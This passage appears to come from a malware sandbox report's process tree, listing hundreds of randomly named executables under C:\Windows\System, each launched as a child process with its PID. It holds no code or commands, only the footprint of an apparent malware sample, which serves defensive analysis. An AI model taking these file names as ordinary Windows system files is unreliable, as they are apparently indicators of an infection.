- C:\Windows\System\DkdPFmC.exe
  C:\Windows\System\DkdPFmC.exe
  2⤵
  PID:3440
- C:\Windows\System\kBBtspV.exe
  C:\Windows\System\kBBtspV.exe
  2⤵
  PID:3464
- C:\Windows\System\kgHysBZ.exe
  C:\Windows\System\kgHysBZ.exe
  2⤵
  PID:3480
- C:\Windows\System\vigTKcw.exe
  C:\Windows\System\vigTKcw.exe
  2⤵
  PID:3496
- C:\Windows\System\YfZthkG.exe
  C:\Windows\System\YfZthkG.exe
  2⤵
  PID:3512
- C:\Windows\System\lFeHwSc.exe
  C:\Windows\System\lFeHwSc.exe
  2⤵
  PID:3532
- C:\Windows\System\WxtpmGM.exe
  C:\Windows\System\WxtpmGM.exe
  2⤵
  PID:3548
- C:\Windows\System\DuFFhye.exe
  C:\Windows\System\DuFFhye.exe
  2⤵
  PID:3592
- C:\Windows\System\HmnKIfe.exe
  C:\Windows\System\HmnKIfe.exe
  2⤵
  PID:3608
- C:\Windows\System\NOmSDqC.exe
  C:\Windows\System\NOmSDqC.exe
  2⤵
  PID:3624
- C:\Windows\System\lfjQKNa.exe
  C:\Windows\System\lfjQKNa.exe
  2⤵
  PID:3640
- C:\Windows\System\JnUQvDE.exe
  C:\Windows\System\JnUQvDE.exe
  2⤵
  PID:3656
- C:\Windows\System\TqQlCxC.exe
  C:\Windows\System\TqQlCxC.exe
  2⤵
  PID:3676
- C:\Windows\System\GUzoCTK.exe
  C:\Windows\System\GUzoCTK.exe
  2⤵
  PID:3692
- C:\Windows\System\ZxnQyeo.exe
  C:\Windows\System\ZxnQyeo.exe
  2⤵
  PID:3708
- C:\Windows\System\pSZPjDm.exe
  C:\Windows\System\pSZPjDm.exe
  2⤵
  PID:3772
- C:\Windows\System\hLUEdJK.exe
  C:\Windows\System\hLUEdJK.exe
  2⤵
  PID:3788
- C:\Windows\System\gRKYCtc.exe
  C:\Windows\System\gRKYCtc.exe
  2⤵
  PID:3804
- C:\Windows\System\rXkEEuz.exe
  C:\Windows\System\rXkEEuz.exe
  2⤵
  PID:3824
- C:\Windows\System\HSuVWFI.exe
  C:\Windows\System\HSuVWFI.exe
  2⤵
  PID:3840
- C:\Windows\System\LsKwrQp.exe
  C:\Windows\System\LsKwrQp.exe
  2⤵
  PID:3856
- C:\Windows\System\AvMVrIN.exe
  C:\Windows\System\AvMVrIN.exe
  2⤵
  PID:3872
- C:\Windows\System\pcOgLxv.exe
  C:\Windows\System\pcOgLxv.exe
  2⤵
  PID:3908
- C:\Windows\System\IUWMPDt.exe
  C:\Windows\System\IUWMPDt.exe
  2⤵
  PID:3924
- C:\Windows\System\XXYhmHr.exe
  C:\Windows\System\XXYhmHr.exe
  2⤵
  PID:3940
- C:\Windows\System\vtMMYBV.exe
  C:\Windows\System\vtMMYBV.exe
  2⤵
  PID:3956
- C:\Windows\System\hkaathq.exe
  C:\Windows\System\hkaathq.exe
  2⤵
  PID:3972
- C:\Windows\System\UmeBBre.exe
  C:\Windows\System\UmeBBre.exe
  2⤵
  PID:3988
- C:\Windows\System\vTYXJpo.exe
  C:\Windows\System\vTYXJpo.exe
  2⤵
  PID:4004
- C:\Windows\System\HqGxOPP.exe
  C:\Windows\System\HqGxOPP.exe
  2⤵
  PID:4020
- C:\Windows\System\SSlSOkP.exe
  C:\Windows\System\SSlSOkP.exe
  2⤵
  PID:4036
- C:\Windows\System\hqlPOcG.exe
  C:\Windows\System\hqlPOcG.exe
  2⤵
  PID:944
- C:\Windows\System\VczaFir.exe
  C:\Windows\System\VczaFir.exe
  2⤵
  PID:2552
- C:\Windows\System\erDaPxZ.exe
  C:\Windows\System\erDaPxZ.exe
  2⤵
  PID:1872
- C:\Windows\System\HysGSTm.exe
  C:\Windows\System\HysGSTm.exe
  2⤵
  PID:3080
- C:\Windows\System\MBatZbi.exe
  C:\Windows\System\MBatZbi.exe
  2⤵
  PID:2480
- C:\Windows\System\aZHRwlZ.exe
  C:\Windows\System\aZHRwlZ.exe
  2⤵
  PID:872
- C:\Windows\System\IixGCvI.exe
  C:\Windows\System\IixGCvI.exe
  2⤵
  PID:2624
- C:\Windows\System\hozWtoz.exe
  C:\Windows\System\hozWtoz.exe
  2⤵
  PID:2380
- C:\Windows\System\LAqdmrR.exe
  C:\Windows\System\LAqdmrR.exe
  2⤵
  PID:3188
- C:\Windows\System\mEwdubo.exe
  C:\Windows\System\mEwdubo.exe
  2⤵
  PID:3228
- C:\Windows\System\lPhROAP.exe
  C:\Windows\System\lPhROAP.exe
  2⤵
  PID:3176
- C:\Windows\System\IeYigWU.exe
  C:\Windows\System\IeYigWU.exe
  2⤵
  PID:3344
- C:\Windows\System\yOKerjg.exe
  C:\Windows\System\yOKerjg.exe
  2⤵
  PID:3384
- C:\Windows\System\LNzhOEe.exe
  C:\Windows\System\LNzhOEe.exe
  2⤵
  PID:3208
- C:\Windows\System\ALGueAY.exe
  C:\Windows\System\ALGueAY.exe
  2⤵
  PID:3272
- C:\Windows\System\TUnfzEQ.exe
  C:\Windows\System\TUnfzEQ.exe
  2⤵
  PID:3368
- C:\Windows\System\xKySazl.exe
  C:\Windows\System\xKySazl.exe
  2⤵
  PID:3276
- C:\Windows\System\uZLTuQR.exe
  C:\Windows\System\uZLTuQR.exe
  2⤵
  PID:3288
- C:\Windows\System\uWXgFtH.exe
  C:\Windows\System\uWXgFtH.exe
  2⤵
  PID:3432
- C:\Windows\System\VmBsyRz.exe
  C:\Windows\System\VmBsyRz.exe
  2⤵
  PID:3408
- C:\Windows\System\YBIIpzu.exe
  C:\Windows\System\YBIIpzu.exe
  2⤵
  PID:1440
- C:\Windows\System\tcsIiPT.exe
  C:\Windows\System\tcsIiPT.exe
  2⤵
  PID:3476
- C:\Windows\System\cadManH.exe
  C:\Windows\System\cadManH.exe
  2⤵
  PID:3540
- C:\Windows\System\yKWLhqf.exe
  C:\Windows\System\yKWLhqf.exe
  2⤵
  PID:3648
- C:\Windows\System\zgImSfB.exe
  C:\Windows\System\zgImSfB.exe
  2⤵
  PID:3724
- C:\Windows\System\nTEHydQ.exe
  C:\Windows\System\nTEHydQ.exe
  2⤵
  PID:3400
- C:\Windows\System\SzKMMZd.exe
  C:\Windows\System\SzKMMZd.exe
  2⤵
  PID:3604
- C:\Windows\System\nDThDSc.exe
  C:\Windows\System\nDThDSc.exe
  2⤵
  PID:3704
- C:\Windows\System\cWIpEpl.exe
  C:\Windows\System\cWIpEpl.exe
  2⤵
  PID:3832
- C:\Windows\System\OJjRRmu.exe
  C:\Windows\System\OJjRRmu.exe
  2⤵
  PID:3632
- C:\Windows\System\MPWPbqO.exe
  C:\Windows\System\MPWPbqO.exe
  2⤵
  PID:2236
- C:\Windows\System\RkVPRtP.exe
  C:\Windows\System\RkVPRtP.exe
  2⤵
  PID:3948
- C:\Windows\System\yBdjpCQ.exe
  C:\Windows\System\yBdjpCQ.exe
  2⤵
  PID:3280
- C:\Windows\System\LuiOpdt.exe
  C:\Windows\System\LuiOpdt.exe
  2⤵
  PID:3428
- C:\Windows\System\yEFSFit.exe
  C:\Windows\System\yEFSFit.exe
  2⤵
  PID:3312
- C:\Windows\System\hKngnnV.exe
  C:\Windows\System\hKngnnV.exe
  2⤵
  PID:3364
- C:\Windows\System\QRQRXMS.exe
  C:\Windows\System\QRQRXMS.exe
  2⤵
  PID:3864
- C:\Windows\System\nCSLvkk.exe
  C:\Windows\System\nCSLvkk.exe
  2⤵
  PID:3868
- C:\Windows\System\VERcTPY.exe
  C:\Windows\System\VERcTPY.exe
  2⤵
  PID:1480
- C:\Windows\System\MEFfiLL.exe
  C:\Windows\System\MEFfiLL.exe
  2⤵
  PID:2680
- C:\Windows\System\zbWjDWt.exe
  C:\Windows\System\zbWjDWt.exe
  2⤵
  PID:3160
- C:\Windows\System\teeqABw.exe
  C:\Windows\System\teeqABw.exe
  2⤵
  PID:3332
- C:\Windows\System\TndrAsV.exe
  C:\Windows\System\TndrAsV.exe
  2⤵
  PID:3784
- C:\Windows\System\czunHps.exe
  C:\Windows\System\czunHps.exe
  2⤵
  PID:1948
- C:\Windows\System\uHemziq.exe
  C:\Windows\System\uHemziq.exe
  2⤵
  PID:940
- C:\Windows\System\BIQLwIn.exe
  C:\Windows\System\BIQLwIn.exe
  2⤵
  PID:1764
- C:\Windows\System\NsELTtW.exe
  C:\Windows\System\NsELTtW.exe
  2⤵
  PID:2676
- C:\Windows\System\SXIrxPs.exe
  C:\Windows\System\SXIrxPs.exe
  2⤵
  PID:3736
- C:\Windows\System\eKhMwPo.exe
  C:\Windows\System\eKhMwPo.exe
  2⤵
  PID:3120
- C:\Windows\System\korDkrz.exe
  C:\Windows\System\korDkrz.exe
  2⤵
  PID:4100
- C:\Windows\System\quhcgFh.exe
  C:\Windows\System\quhcgFh.exe
  2⤵
  PID:4116
- C:\Windows\System\rBXgIbj.exe
  C:\Windows\System\rBXgIbj.exe
  2⤵
  PID:4132
- C:\Windows\System\RsBuvLC.exe
  C:\Windows\System\RsBuvLC.exe
  2⤵
  PID:4196
- C:\Windows\System\SFSwkis.exe
  C:\Windows\System\SFSwkis.exe
  2⤵
  PID:4212
- C:\Windows\System\HftWuAE.exe
  C:\Windows\System\HftWuAE.exe
  2⤵
  PID:4232
- C:\Windows\System\nzRUrPz.exe
  C:\Windows\System\nzRUrPz.exe
  2⤵
  PID:4248
- C:\Windows\System\AoHIMBD.exe
  C:\Windows\System\AoHIMBD.exe
  2⤵
  PID:4268
- C:\Windows\System\kABtVfP.exe
  C:\Windows\System\kABtVfP.exe
  2⤵
  PID:4284
- C:\Windows\System\TiDnOzL.exe
  C:\Windows\System\TiDnOzL.exe
  2⤵
  PID:4300
- C:\Windows\System\rFPlerx.exe
  C:\Windows\System\rFPlerx.exe
  2⤵
  PID:4316
- C:\Windows\System\RCUjrNE.exe
  C:\Windows\System\RCUjrNE.exe
  2⤵
  PID:4388
- C:\Windows\System\zblFBOI.exe
  C:\Windows\System\zblFBOI.exe
  2⤵
  PID:4404
- C:\Windows\System\uMfexBA.exe
  C:\Windows\System\uMfexBA.exe
  2⤵
  PID:4420
- C:\Windows\System\YZaeaBK.exe
  C:\Windows\System\YZaeaBK.exe
  2⤵
  PID:4436
- C:\Windows\System\hAooVJu.exe
  C:\Windows\System\hAooVJu.exe
  2⤵
  PID:4452
- C:\Windows\System\AdsGedx.exe
  C:\Windows\System\AdsGedx.exe
  2⤵
  PID:4468
- C:\Windows\System\thZrmkI.exe
  C:\Windows\System\thZrmkI.exe
  2⤵
  PID:4484
- C:\Windows\System\TItbkJY.exe
  C:\Windows\System\TItbkJY.exe
  2⤵
  PID:4500
- C:\Windows\System\VjbMqov.exe
  C:\Windows\System\VjbMqov.exe
  2⤵
  PID:4568
- C:\Windows\System\mwDZnOH.exe
  C:\Windows\System\mwDZnOH.exe
  2⤵
  PID:4584
- C:\Windows\System\IaULYQK.exe
  C:\Windows\System\IaULYQK.exe
  2⤵
  PID:4600
- C:\Windows\System\wLNGtGE.exe
  C:\Windows\System\wLNGtGE.exe
  2⤵
  PID:4616
- C:\Windows\System\QnlXGzL.exe
  C:\Windows\System\QnlXGzL.exe
  2⤵
  PID:4632
- C:\Windows\System\gsupTlQ.exe
  C:\Windows\System\gsupTlQ.exe
  2⤵
  PID:4648
- C:\Windows\System\vKFmwRm.exe
  C:\Windows\System\vKFmwRm.exe
  2⤵
  PID:4664
- C:\Windows\System\zamhAFg.exe
  C:\Windows\System\zamhAFg.exe
  2⤵
  PID:4776
- C:\Windows\System\EuwHBkg.exe
  C:\Windows\System\EuwHBkg.exe
  2⤵
  PID:4792
- C:\Windows\System\nnzSRHk.exe
  C:\Windows\System\nnzSRHk.exe
  2⤵
  PID:4808
- C:\Windows\System\WCPWOey.exe
  C:\Windows\System\WCPWOey.exe
  2⤵
  PID:4828
- C:\Windows\System\KMgSQWh.exe
  C:\Windows\System\KMgSQWh.exe
  2⤵
  PID:4844
- C:\Windows\System\JKxxGPe.exe
  C:\Windows\System\JKxxGPe.exe
  2⤵
  PID:4860
- C:\Windows\System\cnISChx.exe
  C:\Windows\System\cnISChx.exe
  2⤵
  PID:4876
- C:\Windows\System\lnZTzEU.exe
  C:\Windows\System\lnZTzEU.exe
  2⤵
  PID:4892
- C:\Windows\System\IpugvRU.exe
  C:\Windows\System\IpugvRU.exe
  2⤵
  PID:4908
- C:\Windows\System\hmPxZBI.exe
  C:\Windows\System\hmPxZBI.exe
  2⤵
  PID:4976
- C:\Windows\System\nzJzEBZ.exe
  C:\Windows\System\nzJzEBZ.exe
  2⤵
  PID:4992
- C:\Windows\System\vOkbmsm.exe
  C:\Windows\System\vOkbmsm.exe
  2⤵
  PID:5008
- C:\Windows\System\wnWcZzN.exe
  C:\Windows\System\wnWcZzN.exe
  2⤵
  PID:5024
- C:\Windows\System\svzJAtG.exe
  C:\Windows\System\svzJAtG.exe
  2⤵
  PID:5040
- C:\Windows\System\HoPTjFV.exe
  C:\Windows\System\HoPTjFV.exe
  2⤵
  PID:5056
- C:\Windows\System\ISBRNgB.exe
  C:\Windows\System\ISBRNgB.exe
  2⤵
  PID:5072
- C:\Windows\System\BjLJCLx.exe
  C:\Windows\System\BjLJCLx.exe
  2⤵
  PID:5088
- C:\Windows\System\nFSVvgY.exe
  C:\Windows\System\nFSVvgY.exe
  2⤵
  PID:5104
- C:\Windows\System\opQPYhE.exe
  C:\Windows\System\opQPYhE.exe
  2⤵
  PID:4032
- C:\Windows\System\VuXSJiM.exe
  C:\Windows\System\VuXSJiM.exe
  2⤵
  PID:3556
- C:\Windows\System\qEYpAQU.exe
  C:\Windows\System\qEYpAQU.exe
  2⤵
  PID:4240
- C:\Windows\System\QmboFXO.exe
  C:\Windows\System\QmboFXO.exe
  2⤵
  PID:4308
- C:\Windows\System\QPXXtvB.exe
  C:\Windows\System\QPXXtvB.exe
  2⤵
  PID:2024
- C:\Windows\System\VIZXXYk.exe
  C:\Windows\System\VIZXXYk.exe
  2⤵
  PID:4112
- C:\Windows\System\pzyNRUX.exe
  C:\Windows\System\pzyNRUX.exe
  2⤵
  PID:4144
- C:\Windows\System\klkbkpP.exe
  C:\Windows\System\klkbkpP.exe
  2⤵
  PID:4296
- C:\Windows\System\hhQTmJd.exe
  C:\Windows\System\hhQTmJd.exe
  2⤵
  PID:4412
- C:\Windows\System\wRJVIQZ.exe
  C:\Windows\System\wRJVIQZ.exe
  2⤵
  PID:4576
- C:\Windows\System\yEswfYD.exe
  C:\Windows\System\yEswfYD.exe
  2⤵
  PID:4640
- C:\Windows\System\FGMugQp.exe
  C:\Windows\System\FGMugQp.exe
  2⤵
  PID:4692
- C:\Windows\System\bduhyLX.exe
  C:\Windows\System\bduhyLX.exe
  2⤵
  PID:4712
- C:\Windows\System\sAYLhkY.exe
  C:\Windows\System\sAYLhkY.exe
  2⤵
  PID:4720
- C:\Windows\System\ZqzftqN.exe
  C:\Windows\System\ZqzftqN.exe
  2⤵
  PID:3424
- C:\Windows\System\DKXaaIR.exe
  C:\Windows\System\DKXaaIR.exe
  2⤵
  PID:4868
- C:\Windows\System\LoYCoex.exe
  C:\Windows\System\LoYCoex.exe
  2⤵
  PID:4540
- C:\Windows\System\bqDXwuC.exe
  C:\Windows\System\bqDXwuC.exe
  2⤵
  PID:4564
- C:\Windows\System\OUctiTV.exe
  C:\Windows\System\OUctiTV.exe
  2⤵
  PID:4656
- C:\Windows\System\yPpRpkp.exe
  C:\Windows\System\yPpRpkp.exe
  2⤵
  PID:4852
- C:\Windows\System\DMUPJiu.exe
  C:\Windows\System\DMUPJiu.exe
  2⤵
  PID:4988
- C:\Windows\System\xSlbpsc.exe
  C:\Windows\System\xSlbpsc.exe
  2⤵
  PID:4788
- C:\Windows\System\cFccnSP.exe
  C:\Windows\System\cFccnSP.exe
  2⤵
  PID:4964
- C:\Windows\System\XsYpooT.exe
  C:\Windows\System\XsYpooT.exe
  2⤵
  PID:5000
- C:\Windows\System\XjLHdDH.exe
  C:\Windows\System\XjLHdDH.exe
  2⤵
  PID:5064
- C:\Windows\System\rzOpXHZ.exe
  C:\Windows\System\rzOpXHZ.exe
  2⤵
  PID:4920
- C:\Windows\System\ewpwGwy.exe
  C:\Windows\System\ewpwGwy.exe
  2⤵
  PID:3936
- C:\Windows\System\ZbfLmYk.exe
  C:\Windows\System\ZbfLmYk.exe
  2⤵
  PID:4140
- C:\Windows\System\acsZqHc.exe
  C:\Windows\System\acsZqHc.exe
  2⤵
  PID:4956
- C:\Windows\System\VRwGndC.exe
  C:\Windows\System\VRwGndC.exe
  2⤵
  PID:3508
- C:\Windows\System\UwgeJWV.exe
  C:\Windows\System\UwgeJWV.exe
  2⤵
  PID:4264
- C:\Windows\System\kGnUkrj.exe
  C:\Windows\System\kGnUkrj.exe
  2⤵
  PID:2152
- C:\Windows\System\DFIdKej.exe
  C:\Windows\System\DFIdKej.exe
  2⤵
  PID:4492
- C:\Windows\System\ifmLBAO.exe
  C:\Windows\System\ifmLBAO.exe
  2⤵
  PID:4612
- C:\Windows\System\WyApnSK.exe
  C:\Windows\System\WyApnSK.exe
  2⤵
  PID:4372
- C:\Windows\System\YaYSDAa.exe
  C:\Windows\System\YaYSDAa.exe
  2⤵
  PID:748
- C:\Windows\System\qtQWgZi.exe
  C:\Windows\System\qtQWgZi.exe
  2⤵
  PID:4900
- C:\Windows\System\QNNiOgV.exe
  C:\Windows\System\QNNiOgV.exe
  2⤵
  PID:4624
- C:\Windows\System\NqaVWqP.exe
  C:\Windows\System\NqaVWqP.exe
  2⤵
  PID:2460
- C:\Windows\System\KGFeFce.exe
  C:\Windows\System\KGFeFce.exe
  2⤵
  PID:4836
- C:\Windows\System\tDaEcUu.exe
  C:\Windows\System\tDaEcUu.exe
  2⤵
  PID:1648
- C:\Windows\System\GeEdJYk.exe
  C:\Windows\System\GeEdJYk.exe
  2⤵
  PID:4596
- C:\Windows\System\ApfglZE.exe
  C:\Windows\System\ApfglZE.exe
  2⤵
  PID:1144
- C:\Windows\System\hNGULNP.exe
  C:\Windows\System\hNGULNP.exe
  2⤵
  PID:4824
- C:\Windows\System\jYrrAIe.exe
  C:\Windows\System\jYrrAIe.exe
  2⤵
  PID:3348
- C:\Windows\System\MTNkzNv.exe
  C:\Windows\System\MTNkzNv.exe
  2⤵
  PID:3116
- C:\Windows\System\ZiAcTAA.exe
  C:\Windows\System\ZiAcTAA.exe
  2⤵
  PID:4060
- C:\Windows\System\PWvsnOn.exe
  C:\Windows\System\PWvsnOn.exe
  2⤵
  PID:4952
- C:\Windows\System\fBxNwwd.exe
  C:\Windows\System\fBxNwwd.exe
  2⤵
  PID:4560
- C:\Windows\System\oYsimBw.exe
  C:\Windows\System\oYsimBw.exe
  2⤵
  PID:4708
- C:\Windows\System\vwVbKzb.exe
  C:\Windows\System\vwVbKzb.exe
  2⤵
  PID:4948
- C:\Windows\System\eUHtgSa.exe
  C:\Windows\System\eUHtgSa.exe
  2⤵
  PID:3780
- C:\Windows\System\iiAvzom.exe
  C:\Windows\System\iiAvzom.exe
  2⤵
  PID:4816
- C:\Windows\System\utiHjyi.exe
  C:\Windows\System\utiHjyi.exe
  2⤵
  PID:4188
- C:\Windows\System\sXqehkw.exe
  C:\Windows\System\sXqehkw.exe
  2⤵
  PID:3520
- C:\Windows\System\nBvvwWX.exe
  C:\Windows\System\nBvvwWX.exe
  2⤵
  PID:3284
- C:\Windows\System\xJvYSXx.exe
  C:\Windows\System\xJvYSXx.exe
  2⤵
  PID:2144
- C:\Windows\System\OpEfCMb.exe
  C:\Windows\System\OpEfCMb.exe
  2⤵
  PID:2428
- C:\Windows\System\UBwAXmP.exe
  C:\Windows\System\UBwAXmP.exe
  2⤵
  PID:4448
- C:\Windows\System\YpTGilc.exe
  C:\Windows\System\YpTGilc.exe
  2⤵
  PID:4480
- C:\Windows\System\KFELeOF.exe
  C:\Windows\System\KFELeOF.exe
  2⤵
  PID:2760
- C:\Windows\System\vsffPSO.exe
  C:\Windows\System\vsffPSO.exe
  2⤵
  PID:5020
- C:\Windows\System\XMtcwYD.exe
  C:\Windows\System\XMtcwYD.exe
  2⤵
  PID:4784
- C:\Windows\System\gnnKKAE.exe
  C:\Windows\System\gnnKKAE.exe
  2⤵
  PID:2368
- C:\Windows\System\mBBDLly.exe
  C:\Windows\System\mBBDLly.exe
  2⤵
  PID:4376
- C:\Windows\System\vhzTOzB.exe
  C:\Windows\System\vhzTOzB.exe
  2⤵
  PID:4532
- C:\Windows\System\otmGmaq.exe
  C:\Windows\System\otmGmaq.exe
  2⤵
  PID:4520
- C:\Windows\System\JJpFFLA.exe
  C:\Windows\System\JJpFFLA.exe
  2⤵
  PID:5152
- C:\Windows\System\ZCjbbTf.exe
  C:\Windows\System\ZCjbbTf.exe
  2⤵
  PID:5168
- C:\Windows\System\ytjSyXN.exe
  C:\Windows\System\ytjSyXN.exe
  2⤵
  PID:5184
- C:\Windows\System\agHAiVT.exe
  C:\Windows\System\agHAiVT.exe
  2⤵
  PID:5200
- C:\Windows\System\ZwTDhiz.exe
  C:\Windows\System\ZwTDhiz.exe
  2⤵
  PID:5216
- C:\Windows\System\kcvMLoV.exe
  C:\Windows\System\kcvMLoV.exe
  2⤵
  PID:5232
- C:\Windows\System\lroEOsI.exe
  C:\Windows\System\lroEOsI.exe
  2⤵
  PID:5248
- C:\Windows\System\oYgGGZP.exe
  C:\Windows\System\oYgGGZP.exe
  2⤵
  PID:5264
- C:\Windows\System\mzSNJeW.exe
  C:\Windows\System\mzSNJeW.exe
  2⤵
  PID:5280
- C:\Windows\System\cqpvtYn.exe
  C:\Windows\System\cqpvtYn.exe
  2⤵
  PID:5340
- C:\Windows\System\qVNChVf.exe
  C:\Windows\System\qVNChVf.exe
  2⤵
  PID:5356
- C:\Windows\System\QCsxfzf.exe
  C:\Windows\System\QCsxfzf.exe
  2⤵
  PID:5372
- C:\Windows\System\sjAeYJn.exe
  C:\Windows\System\sjAeYJn.exe
  2⤵
  PID:5388
- C:\Windows\System\BAVBuKO.exe
  C:\Windows\System\BAVBuKO.exe
  2⤵
  PID:5404
- C:\Windows\System\KptLOLu.exe
  C:\Windows\System\KptLOLu.exe
  2⤵
  PID:5420
- C:\Windows\System\nndANQV.exe
  C:\Windows\System\nndANQV.exe
  2⤵
  PID:5436
- C:\Windows\System\MaoZtNs.exe
  C:\Windows\System\MaoZtNs.exe
  2⤵
  PID:5452
- C:\Windows\System\xlUNesP.exe
  C:\Windows\System\xlUNesP.exe
  2⤵
  PID:5468
- C:\Windows\System\FhJrAJt.exe
  C:\Windows\System\FhJrAJt.exe
  2⤵
  PID:5484
- C:\Windows\System\XTzIKgI.exe
  C:\Windows\System\XTzIKgI.exe
  2⤵
  PID:5556
- C:\Windows\System\BIBRULD.exe
  C:\Windows\System\BIBRULD.exe
  2⤵
  PID:5572
- C:\Windows\System\VBKuAVw.exe
  C:\Windows\System\VBKuAVw.exe
  2⤵
  PID:5588
- C:\Windows\System\IkqGkaX.exe
  C:\Windows\System\IkqGkaX.exe
  2⤵
  PID:5604
- C:\Windows\System\AsxNbGk.exe
  C:\Windows\System\AsxNbGk.exe
  2⤵
  PID:5620
- C:\Windows\System\XUThcnS.exe
  C:\Windows\System\XUThcnS.exe
  2⤵
  PID:5636
- C:\Windows\System\uarAzOD.exe
  C:\Windows\System\uarAzOD.exe
  2⤵
  PID:5700
- C:\Windows\System\UbeCaMc.exe
  C:\Windows\System\UbeCaMc.exe
  2⤵
  PID:5716
- C:\Windows\System\zOgsVNt.exe
  C:\Windows\System\zOgsVNt.exe
  2⤵
  PID:5732
- C:\Windows\System\bqbSCuW.exe
  C:\Windows\System\bqbSCuW.exe
  2⤵
  PID:5748
- C:\Windows\System\TbzxIAB.exe
  C:\Windows\System\TbzxIAB.exe
  2⤵
  PID:5764
- C:\Windows\System\pYYfIjd.exe
  C:\Windows\System\pYYfIjd.exe
  2⤵
  PID:5780
- C:\Windows\System\sTyUJpi.exe
  C:\Windows\System\sTyUJpi.exe
  2⤵
  PID:5796
- C:\Windows\System\SqnCeGO.exe
  C:\Windows\System\SqnCeGO.exe
  2⤵
  PID:5812
- C:\Windows\System\KrnUqwI.exe
  C:\Windows\System\KrnUqwI.exe
  2⤵
  PID:5828
- C:\Windows\System\fBpNjJq.exe
  C:\Windows\System\fBpNjJq.exe
  2⤵
  PID:5892
- C:\Windows\System\YmrmTAz.exe
  C:\Windows\System\YmrmTAz.exe
  2⤵
  PID:5908
- C:\Windows\System\vtpgWaY.exe
  C:\Windows\System\vtpgWaY.exe
  2⤵
  PID:5924
- C:\Windows\System\zedEqAb.exe
  C:\Windows\System\zedEqAb.exe
  2⤵
  PID:5940
- C:\Windows\System\iAbpPkI.exe
  C:\Windows\System\iAbpPkI.exe
  2⤵
  PID:5960
- C:\Windows\System\svdSvNf.exe
  C:\Windows\System\svdSvNf.exe
  2⤵
  PID:5976
- C:\Windows\System\QVjksLF.exe
  C:\Windows\System\QVjksLF.exe
  2⤵
  PID:6052
- C:\Windows\System\lWoUCXA.exe
  C:\Windows\System\lWoUCXA.exe
  2⤵
  PID:6068
- C:\Windows\System\akjGIET.exe
  C:\Windows\System\akjGIET.exe
  2⤵
  PID:6084
- C:\Windows\System\qbylbHo.exe
  C:\Windows\System\qbylbHo.exe
  2⤵
  PID:6100
- C:\Windows\System\iqPJUJg.exe
  C:\Windows\System\iqPJUJg.exe
  2⤵
  PID:6116
- C:\Windows\System\fyVsqjK.exe
  C:\Windows\System\fyVsqjK.exe
  2⤵
  PID:6136
- C:\Windows\System\RwzlRUj.exe
  C:\Windows\System\RwzlRUj.exe
  2⤵
  PID:4276
- C:\Windows\System\svuZaiB.exe
  C:\Windows\System\svuZaiB.exe
  2⤵
  PID:3108
- C:\Windows\System\NAswfgL.exe
  C:\Windows\System\NAswfgL.exe
  2⤵
  PID:5116
- C:\Windows\System\fikjALn.exe
  C:\Windows\System\fikjALn.exe
  2⤵
  PID:3848
- C:\Windows\System\wHNghxs.exe
  C:\Windows\System\wHNghxs.exe
  2⤵
  PID:4544
- C:\Windows\System\CoFWgWu.exe
  C:\Windows\System\CoFWgWu.exe
  2⤵
  PID:4704
- C:\Windows\System\NpANdWh.exe
  C:\Windows\System\NpANdWh.exe
  2⤵
  PID:2220
- C:\Windows\System\SziCGmx.exe
  C:\Windows\System\SziCGmx.exe
  2⤵
  PID:5080
- C:\Windows\System\mdAdrbZ.exe
  C:\Windows\System\mdAdrbZ.exe
  2⤵
  PID:5276
- C:\Windows\System\cHzSYvV.exe
  C:\Windows\System\cHzSYvV.exe
  2⤵
  PID:2132
- C:\Windows\System\SprpMwP.exe
  C:\Windows\System\SprpMwP.exe
  2⤵
  PID:3740
- C:\Windows\System\EsEQlvG.exe
  C:\Windows\System\EsEQlvG.exe
  2⤵
  PID:3996
- C:\Windows\System\RppxoOt.exe
  C:\Windows\System\RppxoOt.exe
  2⤵
  PID:5380
- C:\Windows\System\zmniGAu.exe
  C:\Windows\System\zmniGAu.exe
  2⤵
  PID:4804
- C:\Windows\System\htWoHGS.exe
  C:\Windows\System\htWoHGS.exe
  2⤵
  PID:5304
- C:\Windows\System\BhHAhKI.exe
  C:\Windows\System\BhHAhKI.exe
  2⤵
  PID:5428
- C:\Windows\System\rTrWggm.exe
  C:\Windows\System\rTrWggm.exe
  2⤵
  PID:5564
- C:\Windows\System\KyVbxin.exe
  C:\Windows\System\KyVbxin.exe
  2⤵
  PID:5432
- C:\Windows\System\waKVSEU.exe
  C:\Windows\System\waKVSEU.exe
  2⤵
  PID:5552
- C:\Windows\System\xPJvlKB.exe
  C:\Windows\System\xPJvlKB.exe
  2⤵
  PID:5496
- C:\Windows\System\EXnOuic.exe
  C:\Windows\System\EXnOuic.exe
  2⤵
  PID:532
- C:\Windows\System\QHTrsuY.exe
  C:\Windows\System\QHTrsuY.exe
  2⤵
  PID:5740
- C:\Windows\System\SKvordj.exe
  C:\Windows\System\SKvordj.exe
  2⤵
  PID:5776
- C:\Windows\System\WrIOPAw.exe
  C:\Windows\System\WrIOPAw.exe
  2⤵
  PID:5612
- C:\Windows\System\ocTeEQs.exe
  C:\Windows\System\ocTeEQs.exe
  2⤵
  PID:5664
- C:\Windows\System\TAyQnUR.exe
  C:\Windows\System\TAyQnUR.exe
  2⤵
  PID:5824
- C:\Windows\System\ImONGwI.exe
  C:\Windows\System\ImONGwI.exe
  2⤵
  PID:5888
- C:\Windows\System\HcHTJRV.exe
  C:\Windows\System\HcHTJRV.exe
  2⤵
  PID:5956
- C:\Windows\System\EteDPhw.exe
  C:\Windows\System\EteDPhw.exe
  2⤵
  PID:5684
- C:\Windows\System\OQDORzz.exe
  C:\Windows\System\OQDORzz.exe
  2⤵
  PID:6004
- C:\Windows\System\xxXzYPF.exe
  C:\Windows\System\xxXzYPF.exe
  2⤵
  PID:6024
- C:\Windows\System\QYcdnrT.exe
  C:\Windows\System\QYcdnrT.exe
  2⤵
  PID:5932
- C:\Windows\System\IKuNAkg.exe
  C:\Windows\System\IKuNAkg.exe
  2⤵
  PID:3560
- C:\Windows\System\InMcKrb.exe
  C:\Windows\System\InMcKrb.exe
  2⤵
  PID:4352
- C:\Windows\System\BeGrlpH.exe
  C:\Windows\System\BeGrlpH.exe
  2⤵
  PID:5068
- C:\Windows\System\FAMmQzd.exe
  C:\Windows\System\FAMmQzd.exe
  2⤵
  PID:6040
- C:\Windows\System\oxHkhLa.exe
  C:\Windows\System\oxHkhLa.exe
  2⤵
  PID:4344
- C:\Windows\System\oWyiEmG.exe
  C:\Windows\System\oWyiEmG.exe
  2⤵
  PID:4684
- C:\Windows\System\jDaKanP.exe
  C:\Windows\System\jDaKanP.exe
  2⤵
  PID:2764
- C:\Windows\System\GXxGUNt.exe
  C:\Windows\System\GXxGUNt.exe
